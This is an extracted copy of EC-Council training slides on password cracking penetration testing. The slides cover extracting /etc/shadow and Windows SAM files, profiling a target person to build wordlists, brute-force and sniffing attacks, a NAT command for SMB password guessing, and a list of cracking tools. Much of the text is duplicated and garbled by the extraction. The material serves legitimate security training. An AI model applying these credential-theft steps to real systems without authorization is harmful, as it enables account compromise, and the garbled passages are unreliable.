lptv4 module 25 password cracking penetration testing_norestriction

/ECSA/LPT

EC CouncilEC-Council Module XXV

Password Cracking Penetration Testing

Penetration Testing Roadmap

Start HereInformation Vulnerability External

Gathering Analysis Penetration Testing

Fi ll Router and InternalFirewall

Penetration Testing

Router and Switches

Penetration Testing

Internal Network

Penetration Testing

Wireless Network

Penetration Testing

Denial of Service

Penetration Testing

Password Cracking

Stolen Laptop, PDAs and Cell Phones

Social EngineeringApplication

Cont’d

Penetration TestingPenetration Testing Penetration TestingPenetration Testing

Penetration Testing Roadmap (cont’d)(cont d)

Cont’dPhysical S i

Database P i i

VoIP P i T iSecurity

Penetration Testing

Penetration testing Penetration Testing

Vi dVirus and Trojan

Detection

War Dialing VPN Penetration Testing

Log Management

Penetration Testing

File Integrity Checking

Blue Tooth and Hand held

Device Penetration Testing

Telecommunication And Broadband Communication

Email Security Penetration Testing

Security Patches

Data Leakage Penetration Testing

End Here

Communication Penetration Testing

gPenetration Testing

Penetration Testing

Passwords

Companies protect their resources by using combinations of user IDs Companies protect their resources by using combinations of user IDs and passwords.

k b f h d f b li iHackers can brute force or guess the passwords of web applications.

Some system software products use weak or no encryption to store d/ i h i ID d d f h li h and/or transmit their userIDs and passwords from the client to the

server.

One of the leading causes of network compromises is the use of easily One of the leading causes of network compromises is the use of easily guessable or decipherable passwords.

Common Password Vulnerabilities

Weak passwords are:

• Easily guessable, i.e. pet names, car number, family member’s name, etc.

• Comprised of common vocabulary words.

Improper handling of strong passwords:

• Involves the need for the user to write down the password in an insecure location.

Improper handling of strong passwords:

Password Cracking Techniques

• Guessing • Shoulder surfing Social engineering:

Using password crackers or network analyzers

Types of Password Cracking AttacksAttacks

Dictionary attacks: These attacks compare a set of words against a password database.

Brute-force attack: This attack checks for all combination of letters and Brute force attack: This attack checks for all combination of letters and numbers until the password is found.

H b id tt k Thi tt k k d b ddi b d Hybrid attack: This attack cracks any password by adding numbers and symbols to a file name.

Steps in Password Cracking Penetration TestingPenetration Testing

Extract/etc/passwd and /etc/shadow files in Linux systems

Extract SAM file Windows machines

Identify the target person’s personal profile

Build a dictionary of word listsBuild a dictionary of word lists

Attempt to guess passwords

Brute force passwords

U d d k b k d d fil

Use automated passwords crackers to break passwords protected files

Step1: Extract /etc/passwd and /etc/shadow Files in Linux Systems/ / y

root:!:0:0:root:/root:/bin/tcsh

bin:!:1:1:bin:/bin:

daemon:!:2:2:daemon:/sbin:daemon:!:2:2:daemon:/sbin:

adm:!:3:4:adm:/var/adm:

lp:!:4:7:lp:/var/spool/lpd:

sync:!:5:0:sync:/sbin:/bin/sync

shutdown:!:6:0:shutdown:/sbin:/sbin/shutdown

halt:!:7:0:halt:/sbin:/sbin/halt

The password file for Linux is located in /etc and is a text file called passwd.

7 / b / b /

mail:!:8:12:mail:/var/spool/mail:

news:!:9:13:INN (NNTP Server) Admin ID, 525-2525:/usr/local/lib/inn:/bin/ksh

uucp:!:10:14:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico

operator:!:0:0:operator:/root:/bin/tcsh

By default and design, this file is world readable by anyone on the system operator:!:0:0:operator:/root:/bin/tcsh

games:!:12:100:games:/usr/games:

man:!:13:15:man:/usr/man:

postmaster:!:14:12:postmaster:/var/spool/mail:/bin/tcsh

httpd:!:15:30:httpd:/usr/sbin:/usr/sbin/httpd:

nobody:!:65535:100:nobody:/dev/null:

readable by anyone on the system.

On a Unix system using NIS/yp or nobody:!:65535:100:nobody:/dev/null:

ftp:!:404:100::/home/ftp:/bin/nologin

nomad:!:501:100:Simple Nomad, 525-5252:/home/nomad:/bin/bash

webadmin:!:502:100:Web Admin Group ID:/home/webadmin:/bin/bash

h ! Si l N d' Old

On a Unix system using NIS/yp or password shadowing the password data may be located elsewhere. This "shadow" file is usually where the password hashes themselves are located

thegnome:!:503:100:Simple Nomad's Old Account:/home/thegnome:/bin/tcsh

dorkus:!:504:100:Alternate account for Fred:/home/dorkus:/bin/tcsh

themselves are located.

Linux Password Example

nomad:HrLNrZ3VS3TF2:501:100: Simple Nomad:/home/nomad:/bin/bash

This is what the fields actually are:

• Account or user name, what you type in at the login prompt nomad:

• One way encrypted password (plus any aging info) HrLNrZ3VS3TF2:

• User number 501:

• Group number 100:

• GECOS information Simple Nomad:

• Home directory /home/nomad:

• Program to run on login, usually a shell /bin/bash:

Linux Shadow File Example

nomad:$1$fnffc$GteyHdicpGOfffXX40w#5:13064:0:99999:7

This is what the fields actually are:

• Account or user name, what you type in at the login prompt nomad: , y yp g p pnomad:

• Password$1$fnffc$GteyHdicpGOfffX

X40w#5:

• Last password changed13064:

• Minimum number of days required between password changes0: changes

• Maximum number of days the password is valid99999:

• The number of days the user warned before the expiration date of password7:

Check Other Linux & UNIX Variants Variants

Passwords can also be stored in these files:

• /etc/security/passwd (accessible by root only)• / secure/etc/passwd (accessible by root only)

Passwords can also be stored in these files:

• /.secure/etc/passwd (accessible by root only)

Step 2: Extract SAM File Windows Machines

Windows 2000/XP passwords are stored in Windows 2000/XP passwords are stored in c:\winnt\system32\etc\SAM.

The file is named SAM (locked when WINNT is running).

SAMDUMP

Extraction tools:

• SAMDUMP• PWDUMP• L0phtcrack

Extract Backup of SAM/Emergency Repair Disk SAM/Emergency Repair Disk

Windows also store passwords in either a backup of the SAM file in the c:\winnt\repair directory or on an emergency repair disk.

Check Registry

Windows applications store passwords in the Registry or as pp p g yplaintext files on the hard drive.

Check the Microsoft’s Server Message Block (SMB) ProtocolMessage Block (SMB) Protocol

Check for the vulnerability SMB protocol that is used for file and print h isharing

Run NetBIOS Auditing Tool (NAT) and extract the passwords using the f ll i dfollowing command:

nat -u userlist.txt -p passlist.txt testing IP_address

Check the Active Directory Database Database

Ch k f d i th ti di t d t b fil Check for passwords in the active directory database file that are stored locally or spread across domain controllers.

Step 3: Identify the Target Person’s Personal ProfilePerson s Personal Profile

If you are trying to guess Rebecca’s password on her desktop,y y g g p p,then compile a list of items she likes.

• Favorite car

Example:

• Birthday, anniversary day, and other special occasions• Movies, music, sports, drama, and arts• Education, cartoon characters, novelists• Parents, relatives, kids names• Country, city, holiday resorts, etc.• Project working on

Step 4: Build a Dictionary of Word ListsWord Lists

Build a word list based on the information from the previousu d a o d st based o t e o at o o t e p e ousslide.

• Dictionary maker• Pass list

Tools:

Step 5: Attempt to Guess PasswordsPasswords

Obtaining a legitimate user ID is not a easy taskObtaining a legitimate user ID is not a easy task

Creation of user ID involves a variation of employee's first name and last name

Email address posted on the organizations website depicts a sample user ID format

Acquiring a copy of organization’s internal telephone directory enables in discovering and constructing a valid user ID

Many system software products are initially configured with default user IDs and Many system software products are initially configured with default user IDs and passwords

User IDs and passwords designed enables vendors to perform remote i

transactions

Step 6: Brute Force Passwords

Run a dictionary attack and brute-force to crack passwordsRun a dictionary attack and brute force to crack passwords

Tools:

• Brutus• L0phtcrack• Munga bunga• Password cracker

Step 6: Brute Force Passwords (cont’d)(cont d)

Resources:

• www.antifork.org • www.bindview.com • www.cerberus-infosec.co.uk • www.hackersclub.com • www.hoobie.net • www.intrusion.com • www.nai.com • www.nmrc.org www.nmrc.org • http://packetstorm.decepticons.org • www.phenoelit.de • www.securitysoftwaretech.com • www.users.dircon.co.uk/~crypto www.users.dircon.co.uk/ crypto • www.waveset.com • ftp://ftp.cerias.purdue.edu/pub/dict• ftp://ftp.ox.ac.uk/pub/wordlists• packetstormsecurity nl/Crackers/wordlists

• packetstormsecurity.nl/Crackers/wordlists• http://www.outpost9.com/files/WordLists.html

Step 7: Use Automated Passwords Crackers to Break Passwords Protected Files

Automated password cracking Brutus www.antifork.org/ho

obie.net

C b I t t S bp g

tools systematically guess passwords.

Cerberus Internet Scanner www.cerberus-infosec.co.uk

Crack www.users.dircon.co.uk/~crypto

CyberCop Scanner[a] www.nai.com

Tools: Inactive Account Scanner www.waveset.com

Legion and NetBIOS Auditing Tool (NAT)

www.hackersclub.com

LOphtcrack www.securitysoftwaretech.com

John the Ripper SAMDump www nmrc orgJohn the Ripper, SAMDump, PWDump, PWDump2, PWDump3

www.nmrc.org

SecurityAnalyst www.intrusion.com

TeeNet www.phenoelit.de

WebCrack www.packetstorm.decepticons.org

Extract Cleartext Passwords from the Dictionaryy

Logon passwords are stored:

• (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon)

Logon passwords are stored:

NT\CurrentVersion\Winlogon)

Extract Cleartext Passwords from an Encrypted LM hashan Encrypted LM hash

Use the Cain and Abel tool to extract cleartext password from an encrypted LM hash.encrypted LM hash.

Sniff Cleartext Passwords from the Wirethe Wire

FTP HTTP POP SMTP IMAP d d FTP, HTTP, POP3, SMTP, IMAP send passwords as cleartext.

Run a sniffer to capture them.

• dsniffTool:

Replay Attack to Crack Password

A replay attack intercepts the data packets and resends them to p y p pthe receiving server without decryption.

Intercept the communication using network analyzer or sniffer such as Ethereal, TCP dump, or WinDump.

Tool: SAMInside 2.5.8.0 (pwdump)(pwdump)

Extracts Windows NT/2000/XP/2003 users' names and Extracts Windows NT/2000/XP/2003 users names and passwords in national symbol encoding

SAMInside 2.5.8.0 (pwdump): ScreenshotScreenshot

Tool: Dictionary Maker

Dictionary Maker is a tool to compose dictionaries (word lists) for y p ( )password recovery using multiple source text files.

Tool: Password List Recovery 2.6

Password List Recovery shows all the passwords in the current Windows y puser's Password List (PWL) file.

They are kept in the Windows directory and have a .PWL extension.

password

Password List Recovery 2.6: ScreenshotScreenshot

Summary

Passwords protect computer resources and files from unauthorized access by malicious usersmalicious users.

A combination of passwords and UserIDs are used by companies to protect their resources against intrusion by hackers and thieves.

The password file for Linux is located in /etc and is a text file called passwd.

By default and design, the passwd file is world readable by anyone on the system, and might be unsuccessful in rising the protection levels against any of the users.

SAMDUMP is a tool that simplifies migration synchronization of that system.

A word list needs to be built up using the previous slides in order to break

A word list needs to be built up using the previous slides in order to break through the password of the victim.

lptv4 module 25 password cracking penetration testing_norestriction

system software products

uk crypto www

extract cleartext passwords

easily guessable

rights reserved

strictly prohibited

world readable

simple nomad

Documents

password cracking

lptv4 module 13 rules of engagement

lptv4 module 15 pre penetration testing...

lptv4 module 14 penetration testing planning and...

pavement cracking: mechanisms, modeling, … cracking...

hydro cracking

lptv4 module 11 penetration testing...

lptv4 module 31 voip penetration testing_norestriction

cracking a code cracking a code -...

the art of cracking -...

cracking & anti cracking

lptv4 module 41 data leakage penetration...

lptv4 module 27 stolen laptop, pdas and cell phones...

welding research the solidification cracking of ferritic...

lptv4 module 20 router and switches penetration...

lptv4 module 30 database penetration testing_norestriction

lptv4 module 21 firewall penetration testing_norestriction

lptv4 module 18 external penetration testing_norestriction

catalytic cracking - · pdf file3ch2236 advanced petroleum...

lptv4 module 28 application penetration...